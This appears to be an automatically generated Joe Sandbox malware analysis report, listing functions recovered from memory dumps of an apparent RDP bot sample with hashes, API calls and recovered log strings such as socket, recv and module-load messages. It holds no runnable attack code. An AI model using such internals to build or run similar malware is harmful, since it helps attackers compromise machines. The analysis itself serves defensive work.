                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: 6327c41a263b5bd59de28098a4b2cc79f4f79abb1213812bc069fc7c46f51ebf
                                                                                                                                                  • Instruction ID: 6dde35d08f81bb366abf318873cf2a8cf3a69c9018cd0a01aed35f663dcad8e1
                                                                                                                                                  • Opcode Fuzzy Hash: 6327c41a263b5bd59de28098a4b2cc79f4f79abb1213812bc069fc7c46f51ebf
                                                                                                                                                  • Instruction Fuzzy Hash: B2118F71A4C54796E720AFAEF800469A764FF887D4F104236EB6D83BA8DF7CD5098B00
                                                                                                                                                  Function 00007FF8BFB81824 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                                                                                                                                                  • Instruction ID: 7631d90fcac33f23cd3ebdb359f02effd0c428c7ab7b2395ecefb8411b1ac45d
                                                                                                                                                  • Opcode Fuzzy Hash: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                                                                                                                                                  • Instruction Fuzzy Hash: 6A113071A1854286E724AFADF8045B5A760FF887D4F108235EB6D837A5DF7CD509CB00
                                                                                                                                                  Function 00007FF8BFB36230 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 62memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FF8BFB3631F
                                                                                                                                                  • routine_tx, xrefs: 00007FF8BFB36318
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                                                                                                                                  • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                                                                                                  • API String ID: 2539320189-3555278722
                                                                                                                                                  • Opcode ID: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                                                                                                                                                  • Instruction ID: 43d79b9ae4c1c0d72b49ce5039e6fd89cca013d3480998f3a41414150c6764d1
                                                                                                                                                  • Opcode Fuzzy Hash: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                                                                                                                                                  • Instruction Fuzzy Hash: 0C311831A88A4382EB249F99E990639B3A1FB44FC0F188039DB9D43B64CF3CE440C340
                                                                                                                                                  Function 00007FF6BE0343A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-1112464793
                                                                                                                                                  • Opcode ID: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
                                                                                                                                                  • Instruction ID: 948a3ff881a8f2a023ae0b88c23490ac705fc43c1ad052e35497abcbcfa2b9a2
                                                                                                                                                  • Opcode Fuzzy Hash: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
                                                                                                                                                  • Instruction Fuzzy Hash: AE21C290E0D48782FB70965CA584B7CA161EF78319F245A33F34EDE5E4DE2CECA59202
                                                                                                                                                  Function 00007FF8BA4F66C9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-1112464793
                                                                                                                                                  • Opcode ID: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                                                                                                                                                  • Instruction ID: f0527dcbe95aa48de0caaef305bad273a13541f830c6d85b2cf8a9d270ce605f
                                                                                                                                                  • Opcode Fuzzy Hash: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                                                                                                                                                  • Instruction Fuzzy Hash: D821B750E0C0C382FB30475CA99437CA296AF11399F3465B6DF4E8A1E0DE3EED859606
                                                                                                                                                  Function 00007FF8BFB87E69 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-1112464793
                                                                                                                                                  • Opcode ID: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                                                                                                                                                  • Instruction ID: f9da6b9d9c7af8cf84f521e8a18c8c8a8e9b3a49838fd0b9bd05707847679c76
                                                                                                                                                  • Opcode Fuzzy Hash: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                                                                                                                                                  • Instruction Fuzzy Hash: 7421AF50E0C18382FB6446DDA48437C5388AF8039EF744572E74ECA6D6DE2DEEC6D252
                                                                                                                                                  Function 00007FF8BA4F2A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                                                                                                                                                  • Instruction ID: 7336100debd541d3922b031fdae6a1d125ee41bd22867362ddc48195d4bd92b0
                                                                                                                                                  • Opcode Fuzzy Hash: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                                                                                                                                                  • Instruction Fuzzy Hash: 88118F60E1C95391F630535CAC812B51240BF427F4F4163B2DF2D962E6DE5DAA469300
                                                                                                                                                  Function 00007FF8B918559A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                                                                                                                                                  • Instruction ID: 54a49b6cc683f7c40f87477be9d2cc4f61832e5d9d7b78cc60b8f4c376eb720c
                                                                                                                                                  • Opcode Fuzzy Hash: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                                                                                                                                                  • Instruction Fuzzy Hash: 41118251E0C69755F9105F1CA8806B82751AF407F4FA24370DE2D8A5E3FE2CA947B300
                                                                                                                                                  Function 00007FF8BFB52B5A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                                                                                                                                                  • Instruction ID: 8612ae7a319476ee1dd1359d32faf91321d0e089fa5f2a727600c1cc5392ec67
                                                                                                                                                  • Opcode Fuzzy Hash: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                                                                                                                                                  • Instruction Fuzzy Hash: B6115E58E0E61751FA245BACE8612B873516F457F0F504330DF2D9AEE2DE2CF9568700
                                                                                                                                                  Function 00007FF8BFB31C0A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                                                                                                                                                  • Instruction ID: 20d984077ef3eb03a3a6079a1c0af6bafcdd2890f8a2787845fe3d5738dc759c
                                                                                                                                                  • Opcode Fuzzy Hash: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                                                                                                                                                  • Instruction Fuzzy Hash: 1F11A350ECC51741FA14A7ACAD802781358AF407F4FA01331DF3DABAE5DE1CA946D300
                                                                                                                                                  Function 00007FF8BFB820EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 7da5c75f58549cb25f1cac0269867dfb19bddbe817eba6ea8d5b83fe769abe86
                                                                                                                                                  • Instruction ID: 733571e87d911fb63e6a8d039384a8577a09b5653d95f4aebb2b4d5b36266879
                                                                                                                                                  • Opcode Fuzzy Hash: 7da5c75f58549cb25f1cac0269867dfb19bddbe817eba6ea8d5b83fe769abe86
                                                                                                                                                  • Instruction Fuzzy Hash: 94110D50A0C51BC1F925A7ADEC406B42751AF857E4F619331EB2D9AAE6DE1CA546C300
                                                                                                                                                  Function 00007FF6BE031694 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316A2
                                                                                                                                                  • GetLastError.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316CE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                                                                                                                                  • API String ID: 4085810780-4145076245
                                                                                                                                                  • Opcode ID: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
                                                                                                                                                  • Instruction ID: 55df885a54286c5a676c48a863fdd030cf9eed3c66ce72c2b590972b31cf19d7
                                                                                                                                                  • Opcode Fuzzy Hash: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0BE10F4A60741ED20A79EAA508B42670AF3CBC0F880033FF0DA6356ED2CA5A6C300
                                                                                                                                                  Function 00007FF8BA4F2DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: 9adf5fa366108badb66f3825d14c001fe3316979c7670eb6608d00b3c87b209d
                                                                                                                                                  • Instruction ID: f2e504a9af7b1f45e7f43f27f5a04f7fda0403907d79d3095dff79d8e551c65d
                                                                                                                                                  • Opcode Fuzzy Hash: 9adf5fa366108badb66f3825d14c001fe3316979c7670eb6608d00b3c87b209d
                                                                                                                                                  • Instruction Fuzzy Hash: 88F06D71B0C402D1FB219B9CEC843F52310AF163D4F8415B6DF0D461A6EF5EE6498300
                                                                                                                                                  Function 00007FF8B9152DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: 91b5b12ed51ae55352934baa0b39f4641da89fbc1b278aeeed348b83f169e717
                                                                                                                                                  • Instruction ID: c19971c05cbf812be55a9f138efdf6a74e98d668463b3de981aef0ba04bf7787
                                                                                                                                                  • Opcode Fuzzy Hash: 91b5b12ed51ae55352934baa0b39f4641da89fbc1b278aeeed348b83f169e717
                                                                                                                                                  • Instruction Fuzzy Hash: 56F09061F0848391FB139F1CE9403F52311AF143C8F458432DA8D961D6EE5DF548E700
                                                                                                                                                  Function 00007FF8B918595E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
